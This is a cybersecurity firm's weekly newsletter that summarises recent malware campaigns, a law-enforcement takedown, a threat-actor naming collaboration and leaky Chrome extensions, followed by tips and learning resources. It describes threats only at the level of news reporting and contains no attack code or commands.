Hello there 👋
Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
EDDIESTEALER Malware Exploits ClickFix to Steal Sensitive Browser Data
A new Rust-based malware, EDDIESTEALER, is spreading via fake CAPTCHA pages using the ClickFix tactic to trick users into running malicious PowerShell scripts. It bypasses Chrome’s encryption to steal credentials, browser data, and crypto wallet details.
Key takeaways:
🕵️ Sophisticated Delivery: EDDIESTEALER leverages the ClickFix social engineering tactic, using fake CAPTCHA pages on compromised websites to deceive users into executing malicious PowerShell scripts, initiating the infection chain.
🔒 Bypassing Security: Written in Rust, the malware employs obfuscation techniques such as XOR encryption and symbol stripping, and bypasses Chrome’s app-bound encryption to steal sensitive data, including cookies, passwords, and cryptocurrency wallet details.
💻 Cross-Platform Threat: The campaign targets multiple platforms (Windows, macOS, Android, iOS) using tailored attack chains, including browser redirections and drive-by downloads, to deploy EDDIESTEALER and other malware, such as Atomic macOS Stealer.
🛡️ Evasion Techniques: EDDIESTEALER uses anti-sandbox checks, self-deletion via NTFS Alternate Data Streams, and dynamic command-and-control (C2) tasking to evade detection and adapt its behavior, making it a stealthy threat.
🚨 Wider Context: This campaign aligns with Operation Endgame, which disrupted similar malware operations, highlighting the growing use of ClickFix by both cybercriminals and state-sponsored actors to distribute infostealers.
Fake DocuSign and Gitcode Sites Deliver NetSupport RAT via Sophisticated PowerShell Attack
Fake DocuSign and Gitcode websites are tricking users into running malicious PowerShell scripts that deploy NetSupport RAT, enabling remote control of infected systems. The multi-stage attack employs clipboard poisoning and social engineering to evade detection, prompting users to verify the legitimacy of websites.
Key takeaways:
🕵️ Deceptive Lures: Fraudulent websites mimicking DocuSign and Gitcode trick users into copying and running malicious PowerShell scripts via Windows Run commands, often propagated through email or social media social engineering tactics.
🖥️ Multi-Stage Attack: The initial script downloads additional PowerShell scripts from an external server (tradingviewtool[.]com), which fetch a ZIP file containing an executable (jp2launcher.exe) that ultimately deploys NetSupport RAT for remote access.
🔒 Evasion Tactics: The attack’s multi-layered script chain, hosted on domains like docusign.sa[.]com, is designed to evade detection and resist security takedowns, with similarities to the SocGholish campaign noted in October 2024.
🦠 NetSupport RAT Impact: Once installed, NetSupport RAT grants attackers full remote control, allowing them to steal data, manipulate systems, and potentially deploy further malware on compromised Windows systems.
🛡️ Mitigation Advice: Users should avoid executing unsolicited scripts, verify website domains, and deploy endpoint detection tools to monitor for suspicious PowerShell activity and block unauthorized remote access attempts.
Microsoft and CrowdStrike Collaborate to Standardize Cyber Threat Actor Naming
Microsoft and CrowdStrike have teamed up to map aliases for cyber threat groups, enhancing clarity in tracking hackers across their platforms. This initiative aims to streamline threat intelligence and improve response times for defenders without enforcing a single naming standard.
Key takeaways:
🤝 Strategic Partnership: On June 2, 2025, Microsoft and CrowdStrike announced a collaboration to integrate their respective naming systems for threat actors, mapping aliases such as Microsoft’s “Octo Tempest” to CrowdStrike’s “Scattered Spider” for improved clarity.
📊 Threat Actor Reference Guide: Microsoft has updated its threat actor reference guide to include a list of common hacking groups, cross-referencing names used by both companies to help defenders align intelligence and respond more effectively.
🌐 Community-Driven Initiative: The effort is designed to encourage other security firms to join, sharing telemetry data to create a unified view of malicious campaigns. CrowdStrike’s Adam Meyers emphasizes the need for a community-led approach.
🔍 No Unified Standard: The partnership avoids creating a single naming convention, instead focusing on connecting existing aliases to reduce confusion in the cybersecurity community while maintaining each company’s naming methodology.
🚀 Broader Impact: By aligning threat intelligence, the initiative aims to help network defenders translate naming systems, build accurate threat profiles, and stay ahead of sophisticated cyberattacks, such as those linked to groups like Scattered Spider.
International Law Enforcement Dismantles AVCheck, a Key Cybercriminal Tool
International law enforcement has shut down AVCheck, a notorious counter-antivirus service used by cybercriminals to evade detection. The operation, part of Operation Endgame, seized servers and user data, disrupting global cybercrime networks.
Key takeaways:
🚨 Takedown Operation: On May 27, 2025, a global law enforcement effort led by the U.S. Department of Justice and the Dutch National Police seized AVCheck.net, a major counter-antivirus (CAV) service used by cybercriminals to test the detectability of malware.
🕵️ International Collaboration: The operation involved authorities from the U.S., Netherlands, France, Germany, Denmark, Portugal, Ukraine, and Finland, targeting AVCheck’s infrastructure, including servers and user databases.
🖥️ Service Details: AVCheck allowed registered users to scan files against 26 antivirus engines and check domains/IPs against 22 engines, helping cybercriminals refine malware to bypass security defenses.
🔒 Impact on Cybercrime: The takedown, linked to Operation Endgame, is expected to disrupt cybercriminal activities, including ransomware attacks, by limiting their ability to test and deploy undetectable malware.
📊 Seized Assets: Authorities have confiscated AVCheck’s servers and user data, including usernames, emails, and payment details, which may aid further investigations into cybercriminal networks.
Netherlands Team High Tech Crime
Popular Chrome Extensions Expose Millions to Data Leaks via HTTP and Hardcoded Credentials
Popular Chrome extensions, such as SEMrush and Browsec VPN, leak API keys and user data over unencrypted HTTP, risking interception and manipulation. Users are advised to uninstall the affected extensions and review their permissions to protect sensitive information.
Key takeaways:
🔓 Unencrypted Data Transmission: Several widely used Chrome extensions, including SEMRush, Browsec VPN, and Microsoft Editor, transmit sensitive user data and API keys over unencrypted HTTP, exposing millions to adversary-in-the-middle (AitM) attacks that could intercept or modify data.
🕵️ Hardcoded Secrets: These extensions contain hardcoded API keys and secrets within their code, which attackers can extract to manipulate data, access accounts, or cause financial losses, as highlighted by Symantec’s findings, which identified over 21 million users at risk.
🚨 Specific Risks: For example, Browsec VPN’s uninstall URL (browsec-uninstall.s3-website.eu-central-1.amazonaws[.]com) uses HTTP, making it vulnerable to interception, while other extensions expose keys that could lead to unauthorized access or data breaches.
🛡️ Mitigation Steps: Users should uninstall risky extensions, limit extension permissions, regularly audit installed add-ons, and ensure browsers are updated to the latest version to reduce exposure to these vulnerabilities.
⚠️ Ongoing Threat: The reliance on client-side code makes securing API keys challenging; however, developers must adopt secure coding practices, such as encrypting communications, to prevent exploitation, as no immediate fixes have been confirmed for the affected extensions.
Top Tips of the Week
Threat Intelligence
- Integrate CTI into incident response processes. Proactive threat intelligence enhances swift and effective incident handling.
- Collaborate with external CTI experts for threat assessments. Leverage their specialized knowledge to enhance your organization’s threat intelligence capabilities.
Threat Hunting
- Understand the tactics, techniques, and procedures of threat actors. Identify and respond effectively.
- Embrace a threat-centric mindset in cyber threat hunting. Infuse threat intelligence into your organization’s DNA for a proactive cybersecurity culture.
- Learn from historical incidents in cyber threat hunting. Analyzing past events provides insights for improving threat intelligence and incident response.
- Collaborate with threat hunters from different sectors in cyber threat hunting. Cross-industry insights enhance your detection capabilities.
Custom Tooling
- Collaborate with threat intelligence teams in custom tool development. Leverage real-time insights to enhance threat detection capabilities.
Feature Article
In today’s complex cyber landscape, organizations face a critical challenge: determining which threats deserve their limited resources and attention. Threat profiling offers a systematic solution, cutting through the noise to identify and prioritize adversaries most likely to target your organization.
Rather than attempting to defend against everything, which is impossible, threat profiling helps you understand your real threats, how they operate, and where to focus your defenses. It transforms abstract threats into concrete profiles you can act on, shifting from reactive security to proactive defense.
This guide will walk you through the structured process of identifying, analyzing, and documenting the threats that matter most, empowering you to improve your security posture and resource allocation dramatically.
Learning Resources
Are You Using AI Wrong?
In this video, Jeremy makes a bold case: the biggest barrier to AI adoption isn’t tech—it’s mindset.
He explores how non-technical professionals can unlock game-changing creativity with AI by shifting their mindset. Make AI your creativity campaign rather than a technological slave.
🤝 Stop treating AI as a tool. Start treating it like a teammate.
❓ Ask AI to ask you questions—it can guide you better than most tools ever could.
💪 Creativity isn’t magic—it’s discipline. “Do more than the first thing you think of.”
⏳ AI can simulate tough conversations, craft business ideas, and even cut 2 days of admin down to 45 minutes.
The most powerful point? Everyone has creative potential. With the right mindset, you can do more than you think—with a partner you’ve just begun to explore.
How to Report Phishing Campaigns
This excellent presentation describes how you can better report phishing results to executives. It’s packed with actionable insight for cybersecurity pros, especially in GRC and awareness roles!
The presenter doesn’t just teach you how to run phishing simulations using tools like Gophish and Evilginx – he shows how to communicate results to execs in a way that actually lands. No more hearing “That makes no sense.”
Top takeaways:
✅ Use binary metrics (sent, clicked, submitted) for clarity—avoid fluff like open rates.
✅ Embrace data storytelling with pivot tables, XLOOKUPs, and Gantt charts to build credibility.
✅ Keep the culture supportive, not punitive—focus on improvement, not shame.
✅ Show execs how click rates translate to real organizational risk with role-based breakdowns.
Highly recommend this to anyone presenting security data, running phishing campaigns, or just trying to communicate security more effectively.
Vibe Coding 101
Vibe coding is all the rage!
This easily approachable guide will introduce you to AI-assisted coding by walking you through how to build a Super Mario-style browser game using Cursor (AI code editor) and Kaboom.js. No prior coding experience required!
It covers everything from installing tools and writing your first prompt to debugging like a pro using AI support and browser dev tools.
What stood out:
💬 AI like Claude 3.5/3.7 guides the coding process step by step.
🧠 Beginners are taught to think critically—debugging, researching, and consulting documentation.
🎮 Even if AI struggles, the creator shows how persistence and problem-solving still matter.
If you’re new to programming or exploring how AI can accelerate software creation, this is a must-watch. It’s a great primer on how “vibe coding” is making software development more accessible.
A Tabletop Game for Cyber Security
Backdoors & Breaches is a tabletop game that transforms cybersecurity training into an engaging, strategic experience.
Created in 2019 and first launched at DerbyCon, this game sold 4,000 decks in just 24 hours and has since empowered thousands of professionals and educators. From detecting phishing attacks and compromised web servers to navigating chaos like infected HVAC systems, the game forces players to think critically, simulate real-world breaches, and collaborate under pressure.
🎲 The twist? You roll dice to simulate success or failure—mirroring the unpredictability of real-life incident response. It’s a fun, effective way to assess team readiness and security posture.
Highly recommend checking out the video if you want to make cybersecurity training less lecture, more experience.
